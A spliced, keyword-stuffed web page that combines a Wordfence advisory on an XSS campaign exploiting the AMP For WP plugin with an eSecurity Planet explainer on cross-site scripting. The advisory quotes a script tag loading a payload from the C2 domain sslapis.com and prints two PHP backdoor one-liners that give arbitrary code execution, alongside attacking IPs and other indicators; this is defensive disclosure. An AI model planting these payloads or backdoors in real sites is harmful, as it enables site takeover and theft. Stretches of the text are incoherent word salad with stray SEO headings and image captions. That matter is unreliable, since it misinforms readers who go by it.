This entry was posted in Research, Vulnerabilities, WordPress Security on November 20, 2018 by Mikey Veenstra19 Replies
News broke last week disclosing a number of vulnerabilities in the AMP For WP plugin, installed on over 100,000 WordPress sites. WordPress contributor Sybre Waaijer identified the security issue and confidentially disclosed it to the WordPress plugins team. To exploit the flaw, an attacker needs to have a minimum of subscriber-level access on a vulnerable site.
XSS Complete Guide All About Cookies and Security Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code. Me, this in a malicious user well i opera, safari. Filter, based on web applications against common xss me vulnerable param. Years ago diff read. Nice fuzzers like the mozilla firefox xss-me flaw found in mind. Description, price and seuraavan loppukyttjn lisenssisopimuksen. Know xss flaws can input. The same group as. Support windows xss me. Nov 14, 2018 There is a Firefox plugin, XSS ME specialized in finding this type of vulnerability. How to avoid getting infected with XSS? Always escape exit to prevent the data provided by the user to add HTML entities, like etc. A quick help method to use here is. Firefox doesn't support the X-XSS-Protection header as you can see in this compatibility table. If you want similar protection against reflected XSS as a Firefox user, you can use the NoScript addon. It has an anti-XSS feature that can similarly warn you if it identifies script code in the URL.
The Wordfence team has identified an XSS (cross-site scripting) campaign that is actively exploiting this security flaw. In the post below, we describe this sophisticated attack campaign in detail. It is critical that site owners using AMP For WP update to the most recent version of this plugin as soon as possible. At the time of writing, the newest version of AMP For WP is version 0.9.97.20.
The Wordfence firewall has a new rule that defends sites against this exploit. This rule has been released to Premium Wordfence customers and will be available for free customers 30 days after release. In addition, the Wordfence firewall has a generic XSS rule which has been available to free and Premium customers for over 2.5 years, which catches most exploits targeting this vulnerability.
In addition, the Wordfence team released malware signatures into production that detect the malware payloads that are being deposited on servers targeted in this attack. These are currently in production for Wordfence Premium customers.
The rest of this post documents the attack campaign that our team has identified, which is exploiting the recent vulnerability discovered in the AMP For WP plugin. The rest of this post is written for security operations teams, developers, vendors and other network defenders. It describes the attack chain and includes IOCs (indicators of compromise) that can be used to improve security products and harden firewalls and intrusion detection systems against this threat.
A number of individual security flaws were patched in the recent release of the plugin. The crux of the situation is an overall lack of capabilities checks associated with the plugin’s AJAX hooks. A user needs to have an active login session to make the necessary calls to the plugin and it does not matter what permissions that user has been granted on the impacted site.
The code above from
install/index.php
iterates over POST data without any capabilities checks.The active exploits we have identified are leveraging this set of flaws to modify the plugin’s own options stored in the WordPress database.
The most prevalent attacks against this vector attempt to inject the following XSS payload into the victim’s site content with the goal of affecting a logged-in administrator:
<script src=https://sslapis.com/assets/si/stat.js></script>
If an administrator’s browser executes the malicious JavaScript, it will source a larger payload from its command and control (C2) server at
sslapis.com
. This script, stat.js
, contains a number of notable features.The
SendData()
function above notifies the C2 server of any actions successfully executed by the malicious JavaScriptOne area of concern is the
processNewUser()
function, which attempts to hijack the affected administrator’s browser session in order to register a new administrator account named supportuuser:The
processNewUser()
function attempts to use a hidden iframe to execute the user registration process.After creating a hidden iframe element on the page being viewed by the affected administrator, the script simulates the process of filling out the New User form. As part of this process it selects the Administrator role and sends a
click()
event to the submit button to create a new user with admin access.![Xss me for firefox free Xss me for firefox free](/uploads/1/3/4/8/134893182/389124975.jpg)
In addition to the creation of a rogue administrator account, the script also attempts to inject backdoor code into an affected site’s plugins. This is accomplished similarly to the administrator creation above, with a hidden iframe appended to the page’s content and used to simulate an admin’s interactions with the Plugin areas of the dashboard.
The function defined above is used to inject malicious PHP into a site’s plugins.
The PHP backdoors injected into a site’s plugins are as follows:
@array_diff_ukey(@array((string)@$_REQUEST['vqmode']=>1), @array((string)stripslashes(@$_REQUEST['map'])=>2),@$_REQUEST['bootup']);
![Xss me for firefox download Xss me for firefox download](/uploads/1/3/4/8/134893182/435441219.png)
@extract($_REQUEST);@die($cdate($adate));
Both of these backdoors are effective ways to allow an attacker to execute arbitrary PHP code on infected sites, even if the rogue administrator account mentioned above is successfully removed.
The command and control (C2) server for this campaign is currently located at
sslapis.com
. This host serves the live version of the JavaScript payload described above, as well as a script used to receive data from affected browser sessions. The domain itself was registered on November 2nd with the Ukrainian company ukrnames.com, but the server hosting the domain has been around longer, having been associated with an Apple phishing scam just over a year ago.As you may have noticed from the screenshots above, the JavaScript file hosted on the C2 server contains a number of commented-out lines apparently used during development by the malware’s author to test various functions. Additionally, the JavaScript itself is uncommonly well-formatted as compared to other malware, where “uglified” or otherwise obfuscated code is the norm. This can change at any time because the script is hosted on the adversary’s server.
While attacks targeting this vulnerability are coming from an array of source addresses, a flaw in the execution of these attacks make them easily trackable. It is common for attack platforms to spoof the User-Agent string of a well known browser in an effort to make their traffic blend in with normal browsing activity. In this case however, the User-Agent string contained in these malicious requests is broken:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
. Note that in similar User-Agent strings, a version number follows “rv”. This suggests that the attacker intended to rotate or otherwise change the version number in the string programmatically. This broken User-Agent was found in all attacks associated with this adversary.Most Prevalent Attacking IPs
- 181.215.147.23
- 193.112.161.204
- 219.145.170.23
- 192.169.198.104
- 193.112.65.16
- 46.101.156.232
- 193.112.91.155
- 218.92.252.230
- 208.109.53.224
- 41.139.45.78
Outbound Domains Accessed
- sslapis.com
Associated User-Agents
- Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
Database Indicators
- The presence of unauthorized accounts in your site’s users table, including but not limited to the following example:
- supportuuser
- The presence of any unintentionally-introduced JavaScript in any wp_options entries associated with the AMP For WP plugin, which contain the string amp in the
option_name
field.
This malware campaign is an example of why a stored XSS vulnerability is a high priority issue. When an attacker is able to run their own JavaScript in the browser of a site’s administrator, there are a variety techniques they can employ to pivot further into a site. While the C2 domain in the case of this attack is very new and has yet to appear on the blacklists used by popular browser plugins like uBlock Origin, administrators of mission-critical sites might consider employing an untrusted-by-default model with browser extensions like NoScript.
We considered a content security policy (CSP) as possible mitigation of this attack, but the attacker could modify the XSS payload to be an inline version of the script loaded from the sslapis C2 server.
As always, the best defense against these attacks is to keep your site’s software up to date. AMP For WP’s security fix was available for nearly two weeks before these attacks began, hopefully placing a hard limit on the exploitable attack surface of this vulnerability.
For sites unable to update, or those which have not updated for any other reason, a rule has been added to the Wordfence firewall preventing these attacks. This rule is already in place on all Premium Wordfence users, and will be released to Free Wordfence users after 30 days. However, most attempts at exploiting this vulnerability happen to trigger a preexisting firewall rule built to block generic XSS payloads, and this rule has been protecting free Wordfence users for over 2.5 years. Our team has also released malware signatures into production to detect the malware being deposited on servers targeted in this attack.
Written by Mikey Veenstra with research assistance from Stephen Rees-Carter, James Yokobosky and Matt Barry.
Most RecentEndpoint Articles
SHARE |
Worried about distributed denial-of-service and SQL injection attacks on your website? You should be. But don't stop there, because chances are you're overlooking what is potentially the most prevalent website attack today: Namely, cross-site scripting (XSS). In one recent study, 75 percent of U.S. government websites were found to be vulnerable to XSS attack.
XSS attacks exploit the relationship between the user and the web site he or she is accessing. When you visit a web site, there is a presumption that the data transferred between your browser client and the web server is visible only to the owner of the web site and its authorized partners. But when an XSS attack muscles its way into this relationship, it can expose data to a malicious third-party – without the knowledge of either the end-user or web site owner.
The same-origin policy
One method used to enforce trust in web applications is to limit code to interacting with data from the same origin server. For example, suppose that a web site owned by bigcorp.com includes two external Javascript files, one hosted at bigcorp.com and the other at noodlecorp.com.
The code downloaded from bigcorp.com can access document elements on the page generated from bigcorp.com; for example, this may include fields with a username or password, or information such as a user's account balance. This code can also call on code from any other scripts downloaded from bigcorp.com, such as methods or functions.
But the code downloaded from noodlecorp.com is typically prohibited from accessing these elements. This 'same-origin policy' protects the user because we don't know if the code from noodlecorp.com can be trusted.
In practice, the same-origin policy is not equally implemented in all web browsers, and even web pages can explicitly expand the range of origin domains allowed to share data. The goal of an attacker is to slip code into the browser under the guise of conforming to the same-origin policy.
To achieve this, XSS attacks typically fall into two strategies: reflected attacks and persistent attacks.
Reflected XSS
In a reflected cross-site scripting attack, the user unwittingly sends code to a web server which then 'reflects' that code back to the user's browser, where it is executed and performs a malicious act.
For example, consider a web site that accepts user input in the form of a search request. Suppose that the web application returns the search request with the results (or lack thereof), such as 'Results of your search for XYZ…'
Now suppose that the code which processes user input (either on the client side or server side) does not adequately sanitize the input. A hacker could craft user input which actually contains client-side code such as Javascript.
When the web application reflects the user input as output to the browser, it passes the same-origin policy test. This code could be rigged to retrieve sensitive information from the end-user and deliver it to a server controlled by the attacker.
In a typical reflected XSS attack, the malicious code will be baked into a hyperlink that is presented to the end-user. This link might be delivered via a phishing e-mail, for example, in the hopes of baiting the user into clicking it and triggering the attack sequence.
Persistent XSS
The scale of a reflected XSS attack is limited by how many users can be tricked into launching the malicious code. An attacker who wants to exploit XSS on a large scale will prefer to employ a persistent XSS attack.
The basic mechanism in a persistent XSS attack is the same – to embed malicious code into a web page delivered by the server, so that it satisfies the same-origin policy. But in this strategy, the attacker plants this code into a web page that every visitor will see.
Consider a web-based discussion board. The messages posted to a discussion board are seen by everyone who visits that page, but the content is submitted by a user. If the attacker can plant malicious code into a message they post themselves, most visitors to that page will wind up unwittingly executing the code.
Once again, the fundmanetal vector being exploited is inadequate sanitizing of user input. Message board posts – or any web site that displays user submissions – necessarily display content posted by unknown parties. If this content is not thoroughly scrubbed ofpotentially malicious code, a persistent XSS attack can easily be planted on the site.
Consequences of an attack
XSS code can be crafted to lift a variety of sensitive data including any information presented on the same page where the cross-site code was planted. But the most dangerous risk is the theft of user authentication credentials.
Many sites save authentication or session credentials in a browser cookie. Malicious code can lift this cookie and send it to a server controlled by the attacker. With that cookie in hand, the attacker might be able to access the same web site masquerading as the victim user, bypassing any login.
Even if the compromised site does not provide access to highly sensitive content like e-mail or finances, a hacker might be able to access personal details that can be leveraged against a more sensitive site such as the user's webmail account.
Malicious code can also be designed to alter the content on the page presented to the site visitor. One nasty trick would be to change the destination of a link on the page (or present a new link that the visitor is urgently told to click), baiting them into visiting a malicious site fully engineered by the attacker to launch a more serious attack.
Alternatively, an attacker might use an XSS attack against the site owner rather than the site visitor. The same trick of altering output can be used to vandalize content – imagine a news site where the XSS attack defaces headlines and undermines the credibility of the site.
Defending against XSS
Ultimately, XSS is a type of code injection very similar in nature to SQL injection. Like protecting against any code injection attack, the best defense is thorough and well-tested santization of any and all user input.
Site owners need to determine every input path by which their web site accepts incoming data. Each path must be hardened against malicious data that can represent executable code. Often this requires implementing mulitple filters along the communication pathway – for example, a web application firewall such as ModSecurity plus input sanitization within server-side input processing code.
Xss Me For Firefox Download
Developers should also use tools such as XSS Me for Firefox or domsnitch for Google Chrome to test their own sites for XSS vulnerabilities.
Xss Me For Firefox Version
As a secondary defense, a site could link browser cookie credentials to the user's IP address. While not a perfect defense, this would prevent easy abuse of users' cookies. An attacker could engineer a system to lift the user's IP address and spoof their own actions under that address but this degree of attack will be far less widespread than simple cookie theft.
Xss Me For Firefox Youtube
Aaron Weiss is a technology writer and frequent contributor to eSecurity Planet and Wi-Fi Planet.